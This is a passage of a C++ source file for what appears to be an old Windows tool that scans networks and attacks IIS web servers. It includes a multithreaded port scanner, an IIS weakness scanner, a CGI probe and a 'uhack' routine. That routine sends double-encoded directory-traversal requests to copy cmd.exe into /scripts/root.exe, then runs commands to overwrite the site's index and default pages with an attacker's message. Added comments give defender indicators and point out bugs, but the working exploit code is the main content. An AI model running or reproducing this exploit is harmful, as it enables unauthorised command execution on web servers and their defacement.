📄 unicode.cpp
cout<<" must have unicode hole or codered virus"<<endl;
cout<<"Example: "<<prog<<" -p"<<" 3389 192.168.0.1 192.168.0.255"<<endl;
cout<<" "<<prog<<" -cgi 192.168.0.1"<<endl;
cout<<" "<<prog<<" -ftp 192.168.0.1 192.168.0.255 -admin"<<endl;
cout<<" "<<prog<<" -idq 192.168.0.1 192.168.0.255 "<<endl;
cout<<" "<<prog<<" -codered 192.168.0.1 198.168.0.255"<<endl;
return;
}
// Standard port-scan routine: performs one TCP connect probe against one port.
// Presumably started as a worker thread (UINT(LPVOID) signature, `maxthread`
// bookkeeping) - the thread creation is not visible here.
//
// Target address: global `portip`, treated as host byte order (htonl is applied).
// Target port:    `port` - the number itself carried in the pointer value when
//                 `ptop` is true, otherwise a pointer to a decimal string.
// On a hit the address/port is printed, written to `myf`, and the global
// counter `ok` is incremented under HMUTEX.
// Returns 0 when select() reports neither error nor timeout, and (UINT)-1 on
// socket(), ioctlsocket() or select() failure and on timeout.
//
// Defender note: this is a full-connect probe. An open port sees a completed
// TCP handshake with no payload, followed by shutdown/close, so the activity
// is visible in connection logs and to any listener that logs accepts.
UINT pscan(LPVOID port)
{
int portipaddr=portip;
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET)
{cout<<"Socket() Error:"<<WSAGetLastError()<<endl;
// NOTE(review): maxthread is changed here without HMUTEX, while `ok` below is
// guarded; if several threads run this routine the counter can be corrupted.
maxthread--;
return -1;
}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(portipaddr);
// NOTE(review): short(port) converts a pointer to a 16-bit value; it only works
// because the caller stores a small integer in the pointer.
if (ptop==true)// port-to-port scan: the port number is passed directly in the pointer value
server.sin_port=htons(short(port));
else
server.sin_port=htons(short(atoi((char*)port)));
// show progress
if (searchend<=searchnumber+1&&searchnumber!=0)
{
cout<<(searchend)*100/(searchnumber+1)<<"% Complete.\r";
}
// switch the socket to non-blocking mode
unsigned long flag=1;
if (ioctlsocket(s,FIONBIO,&flag)!=0)
{cout<<"ioctlsocket error"<<WSAGetLastError()<<endl;
maxthread--;
closesocket(s);
return -1;
}
// Non-blocking connect: the return value is ignored and completion is
// detected with select() below.
connect(s,(struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3; // 3-second timeout (the original comment said 2 seconds)
timeout.tv_usec=0;
FD_ZERO(& mask); // clear the set
FD_SET(s,& mask); // add the socket to the set
// mask is passed as the write set, so "ready" means the connect completed.
switch(select(s+1,NULL,& mask,NULL,&timeout))
{
// NOTE(review): the select() error path returns without closesocket(s).
case -1: {cout<<"select error"<<endl;maxthread--;return -1;}
case 0: {maxthread--;closesocket(s);return -1;}// timed out
default:
if(FD_ISSET(s,& mask))
{
shutdown(s,0);
// formatted output to the console and to the result file `myf`
// NOTE(review): both writes happen outside HMUTEX; output from concurrent
// threads may interleave.
cout<<inet_ntoa(server.sin_addr)<<" Port:"<<ntohs(server.sin_port)<<" listening"<<endl;
myf<<inet_ntoa(server.sin_addr)<<" Port:"<<ntohs(server.sin_port)<<" listening"<<endl;
WaitForSingleObject(HMUTEX,INFINITE);
ok++;
ReleaseMutex(HMUTEX);
closesocket(s);
maxthread--;
return 0;
}
}
// NOTE(review): reached when select() returned > 0 but FD_ISSET is false; the
// socket is not closed and maxthread is not decremented on this path.
return 0;
}
// uhack - sends a fixed sequence of HTTP requests to port 80 of `ip`.
//
// Stages, each on its own TCP connection:
//   1. two requests that try to copy cmd.exe (from c: and from d:) to root.exe
//      through a "/scripts/..%255c%255c../" path, i.e. a double-encoded
//      backslash traversal out of the scripts directory;
//   2. one request that runs attrib.exe over the global `webpath`;
//   3. four requests through /scripts/root.exe that redirect an echo of the
//      global `message` into webpath + modify[i] (per the status strings
//      below, presumably index.htm, index.asp, default.htm, default.asp).
// Returns -1 on any socket/connect/send/recv failure, otherwise 0 - including
// when no page was modified (only the console text differs).
//
// Defender notes:
//   - Every request is a bare "GET <path>" line with no HTTP version and no
//     headers, which is unusual for browser traffic.
//   - Access-log indicators visible in the literals below: "..%255c" in the
//     URI, "/winnt/system32/cmd.exe" or "attrib.exe" reached via /scripts/,
//     and any request for "/scripts/root.exe".
//   - The traversal depends on the server decoding the path a second time
//     after its directory check (presumably the "unicode hole" named in the
//     usage text - confirm against the vendor advisory); canonicalising the
//     path before the check, removing execute permission from the scripts
//     directory, and patching close it.
int uhack(char *ip)
{
bool copyfile=false,uhack=false;
// NOTE(review): 200-byte buffer filled below with unbounded strcpy/strcat of
// globals (`message`, `webpath`, `modify[i]`); nothing checks the total length.
char mymessage[200];
char * str="GET /scripts/root.exe?/c+echo+^<body+bgcolor%3d#000000+text%3d#FF0000^>^<p+align%3dcenter^>";
char * copycmd="GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+root.exe\r\n";
char * copydcmd="GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+copy+d:\\winnt\\system32\\cmd.exe+root.exe\r\n";
char * attrib="GET /scripts/..%255c%255c../winnt/system32/attrib.exe?+-r+-h+-s+-a+";
SOCKET s;
sockaddr_in server;
char recvbuf[1024];
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET)
{cout<<"socket error"<<endl;
return -1;}
server.sin_family=AF_INET;
server.sin_addr.s_addr=inet_addr(ip);
server.sin_port=htons(80);
if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR)
{cout<<"connect error"<<endl;
return -1;}
// send the copy-file request (c: variant)
if (send(s,copycmd,strlen(copycmd),0)==SOCKET_ERROR)
{cout<<"send error"<<WSAGetLastError()<<endl;
return -1;}
// NOTE(review): recvbuf is uninitialised and recv() does not NUL-terminate it,
// yet it is searched with strstr(); the remote host controls these bytes, so
// the string search can read past the received data.
if (recv(s,recvbuf,1024,0)==SOCKET_ERROR)
{cout<<"recv2 error"<<WSAGetLastError()<<endl;
return -1;}
if (strstr(recvbuf,"1 file(s) copied."))
copyfile=true;
closesocket(s);
// same request again for the d: variant, on a new connection
s=socket(AF_INET,SOCK_STREAM,0);
if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR)
{cout<<"connect error"<<endl;
return -1;}
if (send(s,copydcmd,strlen(copydcmd),0)==SOCKET_ERROR)
{cout<<"send error"<<WSAGetLastError()<<endl;
return -1;}
if (recv(s,recvbuf,1024,0)==SOCKET_ERROR)
{cout<<"recv2 error"<<WSAGetLastError()<<endl;
return -1;}
if (strstr(recvbuf,"1 file(s) copied."))
copyfile=true;
if (copyfile==true)
cout<<"Copy cmd.exe to root.exe.....done."<<endl;
// (disabled) a failed copy is not treated as fatal; execution continues
//else
//{cout<<"Copy cmd.exe to root.exe.....fail."<<endl;
// closesocket(s);
// return -1;}
// send the change-file-attributes request
closesocket(s);
s=socket(AF_INET,SOCK_STREAM,0);
if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR)
{cout<<"connect error"<<endl;
return -1;}
strcpy(mymessage,attrib);
strcat(mymessage,webpath);
strcat(mymessage,"\\*.*\r\n");
if (send(s,mymessage,strlen(mymessage)+1,0)==SOCKET_ERROR)
{cout<<"send error"<<WSAGetLastError()<<endl;
return -1;}
// send the page-modification requests, one connection per target file
for (int i=0;i<4;i++)
{ closesocket(s);
strcpy(mymessage,str);
strcat(mymessage,message);
strcat(mymessage,"^</p^>+>");
strcat(mymessage,webpath);
strcat(mymessage,modify[i]);
s=socket(AF_INET,SOCK_STREAM,0);
if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR)
{cout<<"connect error"<<endl;
return -1;}
if (send(s,mymessage,200,0)==SOCKET_ERROR)
{cout<<"send error"<<WSAGetLastError()<<endl;
return -1;}
// NOTE(review): the length passed to memset comes from strlen() on a buffer
// that was never NUL-terminated, and NULL is used as the fill value.
memset(recvbuf,NULL,strlen(recvbuf)-1);
if (recv(s,recvbuf,1000,0)==SOCKET_ERROR)
{cout<<"recv error"<<WSAGetLastError()<<endl;
return -1;}
//cout<<recvbuf;
// Success is inferred only from the absence of four error substrings in the reply.
if (!((strstr(recvbuf,"cannot find the path"))||(strstr(recvbuf,"Access is denied."))||(strstr(recvbuf,"404"))||(strstr(recvbuf,"500"))))
{
switch (i)
{case 0: cout<<"Modify index.htm.............done."<<endl;break;
case 1: cout<<"Modify index.asp.............done."<<endl;break;
case 2: cout<<"Modify default.htm...........done."<<endl;break;
case 3: cout<<"Modify default.asp...........done."<<endl;break;
}
uhack=true;
}
else
{if (strstr(recvbuf,"cannot find the path"))
cout<<"Cantnot find the path '"<<webpath<<"'."<<endl;
if (strstr(recvbuf,"Access is denied."))
cout<<"Access is denied."<<endl;}
// This check sits outside the else block, so it runs on every iteration.
if (strstr(recvbuf,"404")||strstr(recvbuf,"500"))
cout<<"Not found root.exe."<<endl;
}
closesocket(s);
// A final connection is opened and closed without sending anything: the
// clean-up request that used it is commented out below.
s=socket(AF_INET,SOCK_STREAM,0);
if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR)
{cout<<"connect error"<<endl;
return -1;}
//if (send(s,modify[4],200,0)!=SOCKET_ERROR)
// cout<<"Delete root.exe..............done."<<endl;
closesocket(s);
if (uhack==true)
cout<<endl<<" Modify complete!"<<endl;
else cout<<endl<<" Modify fail."<<endl;
return 0;
}
// Scan one host for an IIS weakness: connect to port 80, send the global
// request `sendbuf`, and report the host when the first reply bytes contain
// the global string `checkhole`.
//
// `ip` carries the IPv4 address as an integer in the pointer value (host byte
// order; htonl is applied). A match is printed with `iisholemessage`, written
// to `myf`, and counted in `ok` under HMUTEX.
// Returns 0 after the probe ran or select() reported nothing usable, and
// (UINT)-1 on socket/ioctl/select/send/recv failure or timeout.
// The contents of `sendbuf` and `checkhole` are defined outside this block.
UINT iisscan(LPVOID ip)
{
// NOTE(review): int(ip) truncates the pointer on builds where pointers are
// wider than int.
int ipaddr=int(ip);
// NOTE(review): recvbuf is never initialised or NUL-terminated, but it is
// searched with strstr() below; the remote host controls its contents.
char recvbuf[100];
SOCKET s;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){cout<<"Socket() Error:"<<WSAGetLastError()<<endl;maxthread--;return -1;}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ipaddr);
server.sin_port=htons(80);
// declarations used for the non-blocking connect below
struct fd_set mask;
struct timeval timeout;
unsigned long flag=1;
// show progress
if (searchend<=searchnumber+1&&searchnumber!=0)
{
cout<<(searchend*100)/(searchnumber)<<"% Complete.\r";
}
// switch the socket to non-blocking mode
if (ioctlsocket(s,FIONBIO,&flag)!=0)
{cout<<"ioctlsocket error"<<WSAGetLastError()<<endl;
maxthread--;
closesocket(s);
return -1;
}
// Non-blocking connect: the return value is ignored and completion is
// detected with select() below.
connect(s,(struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3; // 3-second timeout (the original comment said 2 seconds)
timeout.tv_usec=0;
FD_ZERO(& mask); // clear the set
FD_SET(s,& mask); // add the socket to the set
// mask is passed as the write set, so "ready" means the connect completed.
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {cout<<"select error"<<endl;closesocket(s);maxthread--;return -1;}
case 0: {maxthread--;closesocket(s);return -1;}// timed out
default:
if(FD_ISSET(s,& mask))
{
// NOTE(review): the send-failure path returns without closesocket(s).
if (send(s,sendbuf,strlen(sendbuf),0)==SOCKET_ERROR)
{ maxthread--;return -1;}
// Up to 10 read attempts; 10035 is WSAEWOULDBLOCK (no data yet on the
// non-blocking socket), retried after 200 ms.
// NOTE(review): if all 10 attempts return WSAEWOULDBLOCK the loop ends with
// recvbuf never written, and strstr() below reads uninitialised memory.
for (int i=0;i<10;i++)
{
if (recv(s,recvbuf,100,0)==SOCKET_ERROR)
{ if (WSAGetLastError()==10035) {Sleep(200);continue;}
else
{//cout<<inet_ntoa(server.sin_addr)<<"recv error"<<WSAGetLastError()<<endl;
maxthread--;
closesocket(s);
return -1;
}
}
break;
}
// Only the first successful recv() (at most 100 bytes) is inspected.
if (strstr(recvbuf,checkhole))
{
cout<<inet_ntoa(server.sin_addr)<<iisholemessage<<endl;
myf<<inet_ntoa(server.sin_addr)<<iisholemessage<<endl;
WaitForSingleObject(HMUTEX,INFINITE);
ok++;
ReleaseMutex(HMUTEX);
}
}
}
// NOTE(review): maxthread is decremented without HMUTEX, unlike `ok` above.
maxthread--;
closesocket(s);
return 0;
}
//cgi漏洞测试程序
UINT cgiscan(LPVOID cgistr)
{
char sendbuf[100];
strcpy(sendbuf,"GET ");
strcat(sendbuf,(char*)cgistr);
strcat(sendbuf,"\r\n");
char recvbuf[100];
SOCKET s;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){cout<<"Socket() Error:"<<WSAGetLastError()<<(char*)cgistr<<endl;return -1;}
server.sin_family=AF_INET;
server.sin_addr.s_addr=inet_addr(uhackip);
server.sin_port=htons(80);
//显示进度
if (searchend<=searchnumber+1&&searchnumber!=0)
{
cout<<(searchend)*100/(searchnumber+1)<<"% Complete.\r";
}
//设置套接字为非阻塞模式
struct fd_set mask;
struct timeval timeout;
unsigned long flag=1;
if (ioctlsocket(s,FIONBIO,&flag)!=0)
{cout<<"ioctlsocket error"<<WSAGetLastError()<<endl;
maxthread--;
closesocket(s);
return -1;
}
connect(s,(struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3; // 超时限制为2秒
timeout.tv_usec=0;
FD_ZERO(& mask); //清空集合mask
FD_SET(s,& mask); //将sockfd放入集合mask中
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {closesocket(s);maxthread--;return -1;}
case 0: {maxthread--;closesocket(s);return -1;}//如果超时
default:
if(FD_ISSET(s,& mask))
{
if (send(s,sendbuf,strlen(sendbuf),0)==SOCKET_ERROR)
{ cout<<"send error"<<endl;
closesocket(s);
maxthread--;return -1;
}
for (;;)
{
if (recv(s,recvbuf,100,0)==SOCKET_ERROR)
{
if (WSAGetLastError()==10035) {Sleep(1000);continue;}
else
{
cout<<inet_ntoa(server.sin_addr)<<"recv error"<<WSAGetLastError()<<(char*)cgistr<<endl;
maxthread--;
closesocket(s);
return -1;
}
}
break;